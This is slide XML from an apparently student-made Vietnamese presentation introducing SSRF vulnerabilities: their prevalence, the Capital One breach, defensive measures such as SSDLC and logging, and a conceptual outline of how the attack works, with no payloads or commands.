          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1.1 Thực trạng vấn đề:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020604" y="3716417"/>
            <a:ext cx="8931593"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Hiện nay, lỗ hổng SSRF vẫn rất phổ biến, có rất nhiều CVE về các ứng dụng và phần mềm liên quan tới SSRF vẫn được cập nhật thường xuyên. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020604" y="4521517"/>
            <a:ext cx="8931593"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Theo </a:t>
            </a:r>
            <a:pPr algn="l"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3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Bitdefender Labs</a:t>
            </a:r>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 tính tới cuối năm 2022 đã có khoảng 100.000 cuộc tấn công SSRF vào các doanh nghiệp trên toàn cầu.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020604" y="5326618"/>
            <a:ext cx="8931593"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Vào tháng 7, năm 2019, công ty Capital One đã bị tấn công SSRF dẫn tới truy cập trái phép hơn 100 triệu tài khoản và thẻ tín dụng của người dùng.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293263"/>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76B9FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1.2 Giải pháp đề ra:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2874407"/>
            <a:ext cx="7556421"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Nâng cao nhận thức về các rủi ro bảo mật thông tin nói chung và ứng dụng web nói riêng thông qua các bài blog, bài seminar, các buổi training với hệ thống demo. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4042410"/>
            <a:ext cx="75564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Nghiên cứu và sử dụng quy trình SSDLC (Secure Software Development Lifecycle), đồng thời đào tạo kỹ năng ứng phó và khắc phục sự cố.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4847511"/>
            <a:ext cx="7556421"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Áp dụng các kỹ thuật kiểm tra bảo mật thường xuyên và lưu lại các nhật ký truy cập để dễ dàng theo dõi, phát hiện và xử lý kịp thời các cuộc tấn công SSRF nếu xảy ra.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13027"/>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76B9FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1.3 Mục tiêu đồ án</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3120985"/>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Trong bối cảnh công nghệ thông tin phát triển chóng mặt, các lỗ hổng bảo mật web và ứng dụng ngày càng gia tăng về số lượng và mức độ nguy hiểm, tiềm ẩn rủi ro lớn về mất mát tài sản và thông tin nhạy cảm. Theo OWASP Top 10:2021, SSRF (Server-Side Request Forgery) đã được công nhận là một trong những lỗ hổng bảo mật mới nổi, tạo nên những thách thức đáng kể cho các hệ thống trực tuyến.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4827746"/>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Là những sinh viên ngành An toàn thông tin, nhóm nhận thức rõ tầm quan trọng của việc nắm vững và ứng phó hiệu quả với lỗ hổng SSRF. Đề tài nghiên cứu "SSRF" hướng đến việc cung cấp một cái nhìn tổng quan về cơ chế hoạt động của SSRF, những nguy cơ tiềm ẩn khi hệ thống bị khai thác SSRF, cũng như các giải pháp phòng ngừa để bảo vệ hệ thống khỏi các cuộc tấn công SSRF.</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046940" y="1608534"/>
            <a:ext cx="4536519" cy="566976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="4450"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="76B9FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Tổng quan về SSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2968704"/>
            <a:ext cx="4885015" cy="3114080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239828" y="2657475"/>
            <a:ext cx="3402330" cy="425291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="76B9FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Định nghĩa SSRF:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239828" y="3309580"/>
            <a:ext cx="7604284" cy="1451610"/>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Server-Side Request Forgery (SSRF) hay giả mạo yêu cầu phía máy chủ là một loại lỗ hổng bảo mật web, trong đó kẻ tấn công có thể làm cho ứng dụng phía máy chủ thực hiện các yêu cầu đến các địa chỉ không mong muốn, truy cập và chỉnh sửa tài nguyên trái phép.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239828" y="4965263"/>
            <a:ext cx="7604284" cy="1451610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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Trong một cuộc tấn công SSRF thông thường, kẻ tấn công có thể làm cho máy chủ thực hiện kết nối đến các dịch vụ nội bộ trong cơ sở hạ tầng của tổ chức. Điều này có thể dẫn đến việc rò rỉ dữ liệu nhạy cảm như thông tin xác thực, hoặc thực hiện các hành động không được phép. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="66A8EE"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Robo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[1]</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21888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 1" descr="preencoded.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4151709" y="272177"/>
            <a:ext cx="6326862" cy="2177534"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668917" y="3321487"/>
            <a:ext cx="5292566" cy="544354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="4250"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="76B9FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Cách hoạt động của SSRF:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762119" y="4437340"/>
            <a:ext cx="13106162" cy="30480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 107163"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="585F6B"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2858572" y="4437281"/>
            <a:ext cx="30480" cy="762119"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 107163"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="585F6B"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2628900" y="4192369"/>
            <a:ext cx="489942" cy="489942"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F4652"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2806541" y="4274046"/>
            <a:ext cx="134660" cy="326588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1512927" y="5417225"/>
            <a:ext cx="2721888" cy="340162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2650"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Khai thác</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="979765" y="5887998"/>
            <a:ext cx="3788331" cy="1393508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Kẻ tấn công lợi dụng các chức năng của ứng dụng web như form thông tin, upload hình ảnh hoặc fetch data bên ngoài, để gửi các request độc hại.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7299841" y="4437281"/>
            <a:ext cx="30480" cy="762119"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 107163"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="585F6B"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7070169" y="4192369"/>
            <a:ext cx="489942" cy="489942"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F4652"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7224951" y="4274046"/>
            <a:ext cx="180380" cy="326588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5954197" y="5417225"/>
            <a:ext cx="2721888" cy="340162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2650"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Thao Tác</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5421035" y="5887998"/>
            <a:ext cx="3788331" cy="1741884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Các request này được sửa đổi để khiến web truy cập vào các tài nguyên nội bộ không qua xác thực hoặc sàn lọc, thực hiện các hành động không mong muốn.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11741110" y="4437281"/>
            <a:ext cx="30480" cy="762119"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 107163"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="585F6B"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11511439" y="4192369"/>
            <a:ext cx="489942" cy="489942"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F4652"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11668125" y="4274046"/>
            <a:ext cx="176451" cy="326588"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10395466" y="5417225"/>
            <a:ext cx="2721888" cy="340162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2650"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ảnh hưởng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9862304" y="5887998"/>
            <a:ext cx="3788331" cy="1393508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Kết quả là kẻ tấn công có thể lấy cắp dữ liệu nhạy cảm như cấu hình máy chủ, cơ sở dữ liệu,…vv hoặc thực thi mã từ xa và chiếm quyền hệ thống.</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5329" y="901303"/>
